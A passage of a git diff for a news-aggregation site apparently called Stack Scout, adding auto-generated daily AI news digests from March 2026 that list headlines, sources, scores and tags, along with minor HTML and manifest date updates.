data/digest-2026-03-27.md create mode 100644 data/digest-2026-03-28.md create mode 100644 data/digest-2026-03-29.md create mode 100644 data/digest-2026-03-30.md create mode 100644 data/digest-2026-03-31.md create mode 100644 data/digest-2026-04-01.md create mode 100644 data/digest-2026-04-02.md create mode 100644 data/digest-2026-04-03.md create mode 100644 data/digest-2026-04-04.md create mode 100644 data/digest-2026-04-05.md create mode 100644 data/digest-2026-04-06.md create mode 100644 data/digest-2026-04-07.md create mode 100644 data/digest-2026-04-08.md create mode 100644 data/digest-2026-04-09.md create mode 100644 data/digest-2026-04-10.md create mode 100644 data/digest-2026-04-11.md create mode 100644 data/digest-2026-04-12.md create mode 100644 data/digest-2026-04-14.md create mode 100644 data/digest-2026-04-15.md create mode 100644 data/digest-2026-04-16.md create mode 100644 data/digest-2026-04-17.md create mode 100644 data/digest-2026-04-18.md create mode 100644 data/digest-2026-04-19.md create mode 100644 data/digest-2026-04-20.md create mode 100644 data/digest-2026-04-21.md create mode 100644 data/digest-2026-04-22.md create mode 100644 data/digest-2026-04-23.md create mode 100644 data/digest-2026-04-25.md create mode 100644 data/digest-2026-04-26.md create mode 100644 data/digest-2026-04-27.md create mode 100644 data/digest-2026-04-28.md create mode 100644 data/digest-2026-04-29.md create mode 100644 data/digest-2026-04-30.md create mode 100644 data/digest-2026-05-01.md create mode 100644 data/digest-2026-05-02.md create mode 100644 data/digest-2026-05-03.md create mode 100644 data/digest-2026-05-04.md create mode 100644 data/digest-2026-05-05.md create mode 100644 data/digest-2026-05-06.md create mode 100644 data/digest-2026-05-07.md create mode 100644 data/digest-2026-05-08.md create mode 100644 data/digest-2026-05-09.md create mode 100644 data/digest-2026-05-10.md create mode 100644 data/digest-2026-05-11.md create mode 100644 
data/digest-2026-05-12.md create mode 100644 data/digest-2026-05-13.md create mode 100644 data/digest-2026-05-14.md create mode 100644 data/digest-2026-05-15.md create mode 100644 data/digest-2026-05-16.md create mode 100644 data/digest-2026-05-17.md create mode 100644 data/digest-2026-05-18.md create mode 100644 data/digest-2026-05-19.md create mode 100644 data/digest-2026-05-20.md create mode 100644 data/digest-2026-05-21.md create mode 100644 data/digest-2026-05-22.md create mode 100644 data/digest-2026-05-23.md create mode 100644 data/digest-2026-05-24.md create mode 100644 data/digest-2026-05-25.md create mode 100644 data/digest-2026-05-26.md create mode 100644 data/digest-2026-05-27.md create mode 100644 data/digest-2026-05-28.md create mode 100644 data/digest-2026-05-29.md create mode 100644 data/digest-2026-05-30.md create mode 100644 data/digest-2026-05-31.md create mode 100644 data/digest-2026-06-01.md create mode 100644 data/digest-2026-06-02.md create mode 100644 data/digest-2026-06-03.md create mode 100644 data/digest-2026-06-04.md create mode 100644 data/digest-2026-06-05.md create mode 100644 data/digest-2026-06-06.md create mode 100644 data/news-feed-2026-03-15.json create mode 100644 data/news-feed-2026-03-16.json create mode 100644 data/news-feed-2026-03-17.json create mode 100644 data/news-feed-2026-03-18.json create mode 100644 data/news-feed-2026-03-19.json create mode 100644 data/news-feed-2026-03-20.json create mode 100644 data/news-feed-2026-03-21.json create mode 100644 data/news-feed-2026-03-22.json create mode 100644 data/news-feed-2026-03-23.json create mode 100644 data/news-feed-2026-03-24.json create mode 100644 data/news-feed-2026-03-25.json create mode 100644 data/news-feed-2026-03-26.json create mode 100644 data/news-feed-2026-03-27.json create mode 100644 data/news-feed-2026-03-28.json create mode 100644 data/news-feed-2026-03-29.json create mode 100644 data/news-feed-2026-03-30.json create mode 100644 
data/news-feed-2026-03-31.json create mode 100644 data/news-feed-2026-04-01.json create mode 100644 data/news-feed-2026-04-02.json create mode 100644 data/news-feed-2026-04-03.json create mode 100644 data/news-feed-2026-04-04.json create mode 100644 data/news-feed-2026-04-05.json create mode 100644 data/news-feed-2026-04-06.json create mode 100644 data/news-feed-2026-04-07.json create mode 100644 data/news-feed-2026-04-08.json create mode 100644 data/news-feed-2026-04-09.json create mode 100644 data/news-feed-2026-04-10.json create mode 100644 data/news-feed-2026-04-11.json create mode 100644 data/news-feed-2026-04-12.json create mode 100644 data/news-feed-2026-04-14.json create mode 100644 data/news-feed-2026-04-15.json create mode 100644 data/news-feed-2026-04-16.json create mode 100644 data/news-feed-2026-04-17.json create mode 100644 data/news-feed-2026-04-18.json create mode 100644 data/news-feed-2026-04-19.json create mode 100644 data/news-feed-2026-04-20.json create mode 100644 data/news-feed-2026-04-21.json create mode 100644 data/news-feed-2026-04-22.json create mode 100644 data/news-feed-2026-04-23.json create mode 100644 data/news-feed-2026-04-25.json create mode 100644 data/news-feed-2026-04-26.json create mode 100644 data/news-feed-2026-04-27.json create mode 100644 data/news-feed-2026-04-28.json create mode 100644 data/news-feed-2026-04-29.json create mode 100644 data/news-feed-2026-04-30.json create mode 100644 data/news-feed-2026-05-01.json create mode 100644 data/news-feed-2026-05-02.json create mode 100644 data/news-feed-2026-05-03.json create mode 100644 data/news-feed-2026-05-04.json create mode 100644 data/news-feed-2026-05-05.json create mode 100644 data/news-feed-2026-05-06.json create mode 100644 data/news-feed-2026-05-07.json create mode 100644 data/news-feed-2026-05-08.json create mode 100644 data/news-feed-2026-05-09.json create mode 100644 data/news-feed-2026-05-10.json create mode 100644 data/news-feed-2026-05-11.json create mode 100644 
data/news-feed-2026-05-12.json create mode 100644 data/news-feed-2026-05-13.json create mode 100644 data/news-feed-2026-05-14.json create mode 100644 data/news-feed-2026-05-15.json create mode 100644 data/news-feed-2026-05-16.json create mode 100644 data/news-feed-2026-05-17.json create mode 100644 data/news-feed-2026-05-18.json create mode 100644 data/news-feed-2026-05-19.json create mode 100644 data/news-feed-2026-05-20.json create mode 100644 data/news-feed-2026-05-21.json create mode 100644 data/news-feed-2026-05-22.json create mode 100644 data/news-feed-2026-05-23.json create mode 100644 data/news-feed-2026-05-24.json create mode 100644 data/news-feed-2026-05-25.json create mode 100644 data/news-feed-2026-05-26.json create mode 100644 data/news-feed-2026-05-27.json create mode 100644 data/news-feed-2026-05-28.json create mode 100644 data/news-feed-2026-05-29.json create mode 100644 data/news-feed-2026-05-30.json create mode 100644 data/news-feed-2026-05-31.json create mode 100644 data/news-feed-2026-06-01.json create mode 100644 data/news-feed-2026-06-02.json create mode 100644 data/news-feed-2026-06-03.json create mode 100644 data/news-feed-2026-06-04.json create mode 100644 data/news-feed-2026-06-05.json create mode 100644 data/news-feed-2026-06-06.json create mode 100644 data/news-feed-latest.json diff --git a/catalog/index.html b/catalog/index.html index 6afa345..7d20915 100644 --- a/catalog/index.html +++ b/catalog/index.html @@ -676,7 +676,7 @@

SyncPad

diff --git a/categories/apis/index.html b/categories/apis/index.html index 4175a4c..b12e7da 100644 --- a/categories/apis/index.html +++ b/categories/apis/index.html @@ -175,7 +175,7 @@

Anthropic API

diff --git a/categories/clis/index.html b/categories/clis/index.html index 81b6211..aaabad1 100644 --- a/categories/clis/index.html +++ b/categories/clis/index.html @@ -175,7 +175,7 @@

Wrangler

diff --git a/categories/desktop-apps/index.html b/categories/desktop-apps/index.html index c98a026..4df671e 100644 --- a/categories/desktop-apps/index.html +++ b/categories/desktop-apps/index.html @@ -141,7 +141,7 @@

SyncPad

diff --git a/categories/index.html b/categories/index.html index c9acbbd..64bb4cf 100644 --- a/categories/index.html +++ b/categories/index.html @@ -228,7 +228,7 @@

Desktop Apps

diff --git a/categories/mcps/index.html b/categories/mcps/index.html index f862d74..30e54c8 100644 --- a/categories/mcps/index.html +++ b/categories/mcps/index.html @@ -175,7 +175,7 @@

Playwright MCP

diff --git a/categories/web-apps/index.html b/categories/web-apps/index.html index cb3bc04..c35f706 100644 --- a/categories/web-apps/index.html +++ b/categories/web-apps/index.html @@ -209,7 +209,7 @@

Strudel Studio

diff --git a/categories/web-services/index.html b/categories/web-services/index.html index cf70f1a..15036a9 100644 --- a/categories/web-services/index.html +++ b/categories/web-services/index.html @@ -175,7 +175,7 @@

Make

diff --git a/categories/websites/index.html b/categories/websites/index.html index 999627d..1c17ed0 100644 --- a/categories/websites/index.html +++ b/categories/websites/index.html @@ -175,7 +175,7 @@

Hugging Face

diff --git a/collections/index.html b/collections/index.html index ae64571..c24ecb3 100644 --- a/collections/index.html +++ b/collections/index.html @@ -175,7 +175,7 @@

From the Stack Scout Lab

diff --git a/data/categories-manifest.json b/data/categories-manifest.json index 78826b4..0e2dc9c 100644 --- a/data/categories-manifest.json +++ b/data/categories-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Categories", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "categories": [ { "slug": "websites", diff --git a/data/collections-manifest.json b/data/collections-manifest.json index c6f8013..871d976 100644 --- a/data/collections-manifest.json +++ b/data/collections-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Collections", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "collections": [ { "slug": "creator-stack", diff --git a/data/digest-2026-03-15.md b/data/digest-2026-03-15.md new file mode 100644 index 0000000..0386265 --- /dev/null +++ b/data/digest-2026-03-15.md @@ -0,0 +1,23 @@ +# Stack Scout - AI News Digest +**2026-03-15** | 3 stories | Auto-generated from 55 archived stories + +--- + +## [Show HN: Open-source playground to red-team AI agents with exploits published](https://github.com/fabraix/playground) +*Hacker News* | 15/03/2026 | Score: 0.88 +Tags: open_source + +--- + +## [Chrome DevTools MCP (2025)](https://developer.chrome.com/blog/chrome-devtools-mcp-debug-your-browser-session) +*Hacker News* | 15/03/2026 | Score: 0.81 +Tags: mcp + +--- + +## [Office.eu launches as Europe's sovereign office platform](https://office.eu/media/pressrelease-20260304) +*Hacker News* | 15/03/2026 | Score: 0.76 +Tags: product_launch + +--- + diff --git a/data/digest-2026-03-16.md b/data/digest-2026-03-16.md new file mode 100644 index 0000000..3d9554c --- /dev/null +++ b/data/digest-2026-03-16.md @@ -0,0 +1,53 @@ +# Stack Scout - AI News Digest +**2026-03-16** | 8 stories | Auto-generated from 67 archived stories + +--- + +## [Apideck CLI – An AI-agent interface with much lower context consumption than 
MCP](https://www.apideck.com/blog/mcp-server-eating-context-window-cli-alternative) +*Hacker News* | 16/03/2026 | Score: 1.00 +Tags: mcp, cli_tool, agent_tool + +--- + +## [Speed at the cost of quality: Study of use of Cursor AI in open source projects](https://arxiv.org/abs/2511.04427) +*Hacker News* | 16/03/2026 | Score: 0.87 +Tags: open_source + +--- + +## [Nvidia Launches Vera CPU, Purpose-Built for Agentic AI](https://nvidianews.nvidia.com/news/nvidia-launches-vera-cpu-purpose-built-for-agentic-ai) +*Hacker News* | 16/03/2026 | Score: 0.84 +Tags: product_launch + +--- + +## [Nango (YC W23, API Access for Agents and Apps) Is Hiring](https://jobs.ashbyhq.com/Nango) +*Hacker News* | 16/03/2026 | Score: 0.82 +Tags: api_update + +--- + +## [SpiceCrypt: A Python library for decrypting LTspice encrypted model files](https://github.com/jtsylve/spice-crypt) +*Hacker News* | 15/03/2026 | Score: 0.76 +Tags: developer_tool + +--- + +## [Event Publisher enables event integration between Keycloak and OpenFGA](https://github.com/embesozzi/keycloak-openfga-event-publisher) +*Hacker News* | 16/03/2026 | Score: 0.70 +Tags: tool_update + +--- + +## [Lazycut: A simple terminal video trimmer using FFmpeg](https://github.com/emin-ozata/lazycut) +*Hacker News* | 16/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Leanstral: Open-source agent for trustworthy coding and formal proof engineering](https://mistral.ai/news/leanstral) +*Hacker News* | 16/03/2026 | Score: 0.68 +Tags: open_source + +--- + diff --git a/data/digest-2026-03-17.md b/data/digest-2026-03-17.md new file mode 100644 index 0000000..8ea14b8 --- /dev/null +++ b/data/digest-2026-03-17.md @@ -0,0 +1,107 @@ +# Stack Scout - AI News Digest +**2026-03-17** | 15 stories | Auto-generated from 140 archived stories + +--- + +## [Show HN: Crust – A CLI framework for TypeScript and Bun](https://github.com/chenxin-yan/crust) +*Hacker News* | 17/03/2026 | Score: 0.84 +Tags: developer_tool, cli_tool + +--- + +## [World launches 
tool to verify humans behind AI shopping agents](https://techcrunch.com/2026/03/17/world-launches-tool-to-verify-humans-behind-ai-shopping-agents/) +*TechCrunch AI* | 17/03/2026 | Score: 1.00 +Tags: product_launch + +> As AI agents take the reins for online shoppers, Sam Altman's unconventional startup is looking to expand its verification offerings to support agentic commerce. + +--- + +## [Picsart now allows creators to ‘hire’ AI assistants through agent marketplace](https://techcrunch.com/2026/03/16/picsart-now-allows-creators-to-hire-ai-assistants-through-agent-marketplace/) +*TechCrunch AI* | 17/03/2026 | Score: 1.00 +Tags: agent_tool + +> Picsart's AI agent marketplace will launch with four agents, then add more agents each week. + +--- + +## [Nvidia’s version of OpenClaw could solve its biggest problem: security](https://techcrunch.com/2026/03/16/nvidias-version-of-openclaw-could-solve-its-biggest-problem-security/) +*TechCrunch AI* | 16/03/2026 | Score: 1.00 +Tags: agent_tool + +> Nvidia announced an open enterprise AI agent platform, called NemoClaw, that is built off of viral OpenClaw. + +--- + +## [How to watch Jensen Huang’s Nvidia GTC 2026 keynote — and what to expect](https://techcrunch.com/2026/03/16/nvidia-gtc-how-to-watch-jensen-huang-2026-keynote/) +*TechCrunch AI* | 16/03/2026 | Score: 1.00 +Tags: product_launch + +> GTC is Nvidia's flagship annual event, where the chipmaker typically announces new products, partnerships, and its vision for the future of computing. Huang's keynote will focus on Nvidia's role in the future of computing and AI. + +--- + +## [China’s OpenClaw Boom Is a Gold Rush for AI Companies](https://www.wired.com/story/china-is-going-all-in-on-openclaw/) +*Wired AI* | 13/03/2026 | Score: 0.91 +Tags: open_source + +> Hype around the open source agent is driving people to rent cloud servers and buy AI subscriptions just to try it, creating a windfall for tech companies. 
+ +--- + +## [Mistral AI Releases Forge](https://mistral.ai/news/forge) +*Hacker News* | 17/03/2026 | Score: 0.79 +Tags: product_launch + +--- + +## [Show HN: Horizon – GPU-accelerated infinite-canvas terminal in Rust](https://github.com/peters/horizon) +*Hacker News* | 17/03/2026 | Score: 0.78 +Tags: cli_tool + +--- + +## [Chrome extension adjusts video speed based on how fast the speaker is talking](https://github.com/ywong137/speech-speed) +*Hacker News* | 13/03/2026 | Score: 0.78 +Tags: developer_tool + +--- + +## [Retraction: After a routine code rejection, an AI agent published a hit piece on someone by name](https://arstechnica.com/ai/2026/02/after-a-routine-code-rejection-an-ai-agent-published-a-hit-piece-on-someone-by-name/) +*Ars Technica AI* | 13/02/2026 | Score: 0.78 +Tags: agent_tool + +> This story has been retracted + +--- + +## [Node.js needs a virtual file system](https://blog.platformatic.dev/why-nodejs-needs-a-virtual-file-system) +*Hacker News* | 17/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Kagi Translate now supports LinkedIn Speak as an output language](https://translate.kagi.com/?from=en&to=LinkedIn+speak) +*Hacker News* | 17/03/2026 | Score: 0.70 +Tags: tool_update + +--- + +## [Reverse-engineering Viktor and making it Open Source](https://matijacniacki.com/blog/openviktor) +*Hacker News* | 17/03/2026 | Score: 0.68 +Tags: open_source + +--- + +## [Building a Shell](https://healeycodes.com/building-a-shell) +*Hacker News* | 17/03/2026 | Score: 0.62 +Tags: cli_tool + +--- + +## [Show HN: Droeftoeter, a Terminal Coding Toy](https://github.com/whtspc/droeftoeter) +*Hacker News* | 13/03/2026 | Score: 0.62 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-18.md b/data/digest-2026-03-18.md new file mode 100644 index 0000000..b931e5a --- /dev/null +++ b/data/digest-2026-03-18.md @@ -0,0 +1,71 @@ +# Stack Scout - AI News Digest +**2026-03-18** | 10 stories | Auto-generated from 90 archived stories + +--- + +## [The leaderboard “you 
can’t game,” funded by the companies it ranks](https://techcrunch.com/video/the-leaderboard-you-cant-game-funded-by-the-companies-it-ranks/) +*TechCrunch AI* | 18/03/2026 | Score: 1.00 +Tags: product_launch + +> Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […] + +--- + +## [The PhD students who became the judges of the AI industry](https://techcrunch.com/podcast/the-phd-students-who-became-the-judges-of-the-ai-industry/) +*TechCrunch AI* | 18/03/2026 | Score: 1.00 +Tags: product_launch + +> Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […] + +--- + +## [Meta is having trouble with rogue AI agents](https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/) +*TechCrunch AI* | 18/03/2026 | Score: 0.99 +Tags: agent_tool + +> A rogue AI agent inadvertently exposed Meta company and user data to engineers who didn't have permission to see it. 
+ +--- + +## [Launch an autonomous AI agent with sandboxed execution in 2 lines of code](https://amaiya.github.io/onprem/examples_agent.html) +*Hacker News* | 18/03/2026 | Score: 0.98 +Tags: agent_tool + +--- + +## [Nightingale – open-source karaoke app that works with any song on your computer](https://nightingale.cafe/) +*Hacker News* | 18/03/2026 | Score: 0.76 +Tags: open_source + +--- + +## [A ngrok-style secure tunnel server written in Rust and Open Source](https://github.com/joaoh82/rustunnel) +*Hacker News* | 18/03/2026 | Score: 0.71 +Tags: open_source + +--- + +## [Show HN: Tmux-IDE, OSS agent-first terminal IDE](https://tmux.thijsverreck.com) +*Hacker News* | 18/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Show HN: Pgit – A Git-like CLI backed by PostgreSQL](https://oseifert.ch/blog/building-pgit) +*Hacker News* | 17/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Show HN: Hacker News archive (47M+ items, 11.6GB) as Parquet, updated every 5m](https://huggingface.co/datasets/open-index/hacker-news) +*Hacker News* | 14/03/2026 | Score: 0.70 +Tags: tool_update + +--- + +## [Measuring progress toward AGI: A cognitive framework](https://blog.google/innovation-and-ai/models-and-research/google-deepmind/measuring-agi-cognitive-framework/) +*Hacker News* | 18/03/2026 | Score: 0.61 +Tags: developer_tool + +--- + diff --git a/data/digest-2026-03-19.md b/data/digest-2026-03-19.md new file mode 100644 index 0000000..4b8563a --- /dev/null +++ b/data/digest-2026-03-19.md @@ -0,0 +1,39 @@ +# Stack Scout - AI News Digest +**2026-03-19** | 5 stories | Auto-generated from 98 archived stories + +--- + +## [Multiverse Computing pushes its compressed AI models into the mainstream](https://techcrunch.com/2026/03/19/multiverse-computing-pushes-its-compressed-ai-models-into-the-mainstream/) +*TechCrunch AI* | 19/03/2026 | Score: 1.00 +Tags: api_update, tool_update + +> After compressing models from major AI labs, including OpenAI, Meta, DeepSeek, and Mistral AI, 
Multiverse Computing has launched both an app that showcases the capabilities of its compressed models and an API that makes them more widely available. + +--- + +## [DoorDash launches a new ‘Tasks’ app that pays couriers to submit videos to train AI](https://techcrunch.com/2026/03/19/doordash-launches-a-new-tasks-app-that-pays-couriers-to-submit-videos-to-train-ai/) +*TechCrunch AI* | 19/03/2026 | Score: 0.91 +Tags: product_launch + +> Delivery couriers will be able to earn money by completing activities like filming everyday tasks or recording themselves speaking in another language. + +--- + +## [Hyper-optimized reverse geocoding API](https://github.com/traccar/traccar-geocoder) +*Hacker News* | 19/03/2026 | Score: 0.76 +Tags: api_update + +--- + +## [Framework doesn't matter](https://cemrehancavdar.com/2026/02/19/your-framework-may-not-matter/) +*Hacker News* | 14/03/2026 | Score: 0.76 +Tags: developer_tool + +--- + +## [Cook: A simple CLI for orchestrating Claude Code](https://rjcorwin.github.io/cook/) +*Hacker News* | 19/03/2026 | Score: 0.65 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-20.md b/data/digest-2026-03-20.md new file mode 100644 index 0000000..1330ddd --- /dev/null +++ b/data/digest-2026-03-20.md @@ -0,0 +1,45 @@ +# Stack Scout - AI News Digest +**2026-03-20** | 6 stories | Auto-generated from 82 archived stories + +--- + +## [OpenCode – Open source AI coding agent](https://opencode.ai/) +*Hacker News* | 20/03/2026 | Score: 0.76 +Tags: open_source, agent_tool + +--- + +## [My AI Agent ‘Cofounder’ Conquered LinkedIn. Then It Got Banned](https://www.wired.com/story/linkedin-invited-my-ai-cofounder-to-give-a-corporate-talk-then-banned-it/) +*Wired AI* | 20/03/2026 | Score: 1.00 +Tags: agent_tool + +> When social media is constantly pushing people to use AI, why not let AI agents participate? 
+ +--- + +## [Trump’s AI framework targets state laws, shifts child safety burden to parents](https://techcrunch.com/2026/03/20/trumps-ai-framework-targets-state-laws-shifts-child-safety-burden-to-parents/) +*TechCrunch AI* | 20/03/2026 | Score: 0.91 +Tags: developer_tool + +> Trump’s AI framework pushes federal preemption of state laws, emphasizes innovation, and shifts responsibility for child safety toward parents while laying out lighter-touch rules for tech companies. + +--- + +## [Show HN: We built a terminal-only Bluesky / AT Proto client written in Fortran](https://github.com/FormerLab/fortransky) +*Hacker News* | 20/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Show HN: Sonar – A tiny CLI to see and kill whatever's running on localhost](https://github.com/RasKrebs/sonar) +*Hacker News* | 20/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Show HN: An open-source safety net for home hemodialysis](https://safehemo.com/) +*Hacker News* | 17/03/2026 | Score: 0.68 +Tags: open_source + +--- + diff --git a/data/digest-2026-03-21.md b/data/digest-2026-03-21.md new file mode 100644 index 0000000..3e8826b --- /dev/null +++ b/data/digest-2026-03-21.md @@ -0,0 +1,49 @@ +# Stack Scout - AI News Digest +**2026-03-21** | 7 stories | Auto-generated from 80 archived stories + +--- + +## [Apple Announces New Mac Sales Record Following MacBook Neo Launch](https://www.macrumors.com/2026/03/20/apple-shares-mac-sales-achievement/) +*Hacker News* | 21/03/2026 | Score: 0.90 +Tags: product_launch + +--- + +## [Mamba-3](https://www.together.ai/blog/mamba-3) +*Hacker News* | 17/03/2026 | Score: 0.87 +Tags: open_source + +> Meet Mamba-3: the SSM built for inference. Faster than Transformers at decode, stronger than Mamba-2, and open-source from day one. 
+ +--- + +## [Iran launched unsuccessful attack on UK's Diego Garcia](https://www.bbc.com/news/articles/c5yljdgwppzo) +*Hacker News* | 21/03/2026 | Score: 0.84 +Tags: tool_update + +--- + +## [Show HN: Termcraft – terminal-first 2D sandbox survival in Rust](https://github.com/pagel-s/termcraft) +*Hacker News* | 21/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Atuin v18.13 – better search, a PTY proxy, and AI for your shell](https://blog.atuin.sh/atuin-v18-13/) +*Hacker News* | 21/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [purl: a curl-esque CLI for making HTTP requests that require payment](https://www.purl.dev/) +*Hacker News* | 21/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Floci – A free, open-source local AWS emulator](https://github.com/hectorvent/floci) +*Hacker News* | 21/03/2026 | Score: 0.68 +Tags: open_source + +--- + diff --git a/data/digest-2026-03-22.md b/data/digest-2026-03-22.md new file mode 100644 index 0000000..c0ab7c7 --- /dev/null +++ b/data/digest-2026-03-22.md @@ -0,0 +1,49 @@ +# Stack Scout - AI News Digest +**2026-03-22** | 7 stories | Auto-generated from 88 archived stories + +--- + +## [Elon Musk unveils chip manufacturing plans for SpaceX and Tesla](https://techcrunch.com/2026/03/22/elon-musk-unveils-chip-manufacturing-plans-for-spacex-and-tesla/) +*TechCrunch AI* | 22/03/2026 | Score: 1.00 +Tags: product_launch + +> Elon Musk recently outlined ambitious plans for a chip-building collaboration Tesla and SpaceX — but he has a history of overpromising. 
+ +--- + +## [Show HN: A Markdown file that turns your AI agent into an autonomous researcher](https://github.com/krzysztofdudek/ResearcherSkill) +*Hacker News* | 22/03/2026 | Score: 0.92 +Tags: agent_tool + +--- + +## [HopTab–free,open source macOS app switcher and tiler that replaces Cmd+Tab](https://www.royalbhati.com/hoptab) +*Hacker News* | 22/03/2026 | Score: 0.76 +Tags: open_source + +--- + +## [Training Center for Maneuvering on Manned Model Ships](https://www.portrevel.com/) +*Hacker News* | 20/03/2026 | Score: 0.76 +Tags: tool_update + +--- + +## [$ teebot.dev – from terminal to tee in 6 seconds](https://teebot.dev) +*Hacker News* | 22/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [How to Attract AI Bots to Your Open Source Project](https://nesbitt.io/2026/03/21/how-to-attract-ai-bots-to-your-open-source-project.html) +*Hacker News* | 21/03/2026 | Score: 0.68 +Tags: open_source + +--- + +## [Node.js worker threads are problematic, but they work great for us](https://www.inngest.com/blog/node-worker-threads) +*Hacker News* | 18/03/2026 | Score: 0.62 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-23.md b/data/digest-2026-03-23.md new file mode 100644 index 0000000..cf1d945 --- /dev/null +++ b/data/digest-2026-03-23.md @@ -0,0 +1,25 @@ +# Stack Scout - AI News Digest +**2026-03-23** | 3 stories | Auto-generated from 82 archived stories + +--- + +## [The Download: animal welfare gets AGI-pilled, and the White House unveils its AI policy](https://www.technologyreview.com/2026/03/23/1134509/the-download-animal-welfare-agi-pilled-white-house-unveils-ai-policy/) +*MIT Tech Review AI* | 23/03/2026 | Score: 0.88 +Tags: product_launch + +> This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. 
The Bay Area’s animal welfare movement wants to recruit AI  In early February, animal welfare advocates and AI researchers arrived in stocking feet at Mox, a scrappy, shoes-free coworking space in… + +--- + +## [Show HN: Agent Kernel – Three Markdown files that make any AI agent stateful](https://github.com/oguzbilgic/agent-kernel) +*Hacker News* | 23/03/2026 | Score: 0.78 +Tags: agent_tool + +--- + +## [The way CTRL-C in Postgres CLI cancels queries is incredibly hack-y](https://neon.com/blog/ctrl-c-in-psql-gives-me-the-heebie-jeebies) +*Hacker News* | 20/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-24.md b/data/digest-2026-03-24.md new file mode 100644 index 0000000..5f3535c --- /dev/null +++ b/data/digest-2026-03-24.md @@ -0,0 +1,65 @@ +# Stack Scout - AI News Digest +**2026-03-24** | 9 stories | Auto-generated from 101 archived stories + +--- + +## [Google TV’s new Gemini features keep fans updated on sports teams and more](https://techcrunch.com/2026/03/24/google-tv-new-gemini-features-keep-fans-updated-on-sports-teams-deep-dives-visual-answers/) +*TechCrunch AI* | 24/03/2026 | Score: 1.00 +Tags: tool_update + +> Three Gemini-powered features are coming to your Google TV. This includes visual responses, deep dives, and sports briefs. + +--- + +## [OpenAI adds open source tools to help developers build for teen safety](https://techcrunch.com/2026/03/24/openai-adds-open-source-tools-to-help-developers-build-for-teen-safety/) +*TechCrunch AI* | 24/03/2026 | Score: 0.94 +Tags: open_source + +> Rather than working from scratch to figure out how to make AI safer for teens, developers can use these policies to fortify what they build. 
+ +--- + +## [Sunsetting the Techempower Framework Benchmarks](https://github.com/TechEmpower/FrameworkBenchmarks/issues/10932) +*Hacker News* | 24/03/2026 | Score: 0.82 +Tags: developer_tool + +--- + +## [Self-propagating malware poisons open source software and wipes Iran-based machines](https://arstechnica.com/security/2026/03/self-propagating-malware-poisons-open-source-software-and-wipes-iran-based-machines/) +*Ars Technica AI* | 24/03/2026 | Score: 0.76 +Tags: open_source + +> Development houses: It's time to check your networks for infections. + +--- + +## [Qite.js – Frontend framework for people who hate React and love HTML](https://qitejs.qount25.dev) +*Hacker News* | 19/03/2026 | Score: 0.76 +Tags: developer_tool + +--- + +## [Nanobrew: The fastest macOS package manager compatible with brew](https://nanobrew.trilok.ai/) +*Hacker News* | 24/03/2026 | Score: 0.70 +Tags: developer_tool + +--- + +## [A retro terminal music player inspired by Winamp](https://github.com/bjarneo/cliamp) +*Hacker News* | 23/03/2026 | Score: 0.70 +Tags: cli_tool + +--- + +## [Show HN: Gridland: make terminal apps that also run in the browser](https://www.gridland.io/) +*Hacker News* | 24/03/2026 | Score: 0.62 +Tags: cli_tool + +--- + +## [Log File Viewer for the Terminal](https://lnav.org/) +*Hacker News* | 24/03/2026 | Score: 0.62 +Tags: cli_tool + +--- + diff --git a/data/digest-2026-03-25.md b/data/digest-2026-03-25.md new file mode 100644 index 0000000..e80cc8d --- /dev/null +++ b/data/digest-2026-03-25.md @@ -0,0 +1,53 @@ +# Stack Scout - AI News Digest +**2026-03-25** | 7 stories | Auto-generated from 95 archived stories + +--- + +## [Google launches Lyria 3 Pro music generation model](https://techcrunch.com/2026/03/25/google-launches-lyria-3-pro-music-generation-model/) +*TechCrunch AI* | 25/03/2026 | Score: 1.00 +Tags: product_launch + +> Google is launching Lyria 3 Pro, an upgraded music model that generates longer, more customizable tracks, as it expands AI music tools 
across Gemini, enterprise products, and other services. + +--- + +## [Meta launches new initiative to support entrepreneurship, drive AI adoption](https://techcrunch.com/2026/03/25/meta-launches-new-initiative-to-support-entrepreneurship-drive-ai-adoption/) +*TechCrunch AI* | 25/03/2026 | Score: 1.00 +Tags: product_launch + +> Meta CEO Mark Zuckerberg said in a memo to staff that small businesses have always been a big part of the company's business model, and that while tens of millions of entrepreneurs already use its platforms to grow and connect with customers, the company wants to do more in the space. + +--- + +## [Google unveils TurboQuant, a new AI memory compression algorithm — and yes, the internet is calling it ‘Pied Piper’](https://techcrunch.com/2026/03/25/google-turboquant-ai-memory-compression-silicon-valley-pied-piper/) +*TechCrunch AI* | 25/03/2026 | Score: 0.77 +Tags: product_launch + +> Google’s TurboQuant has the internet joking about Pied Piper from HBO's "Silicon Valley." The compression algorithm promises to shrink AI’s “working memory” by up to 6x, but it’s still just a lab experiment for now. 
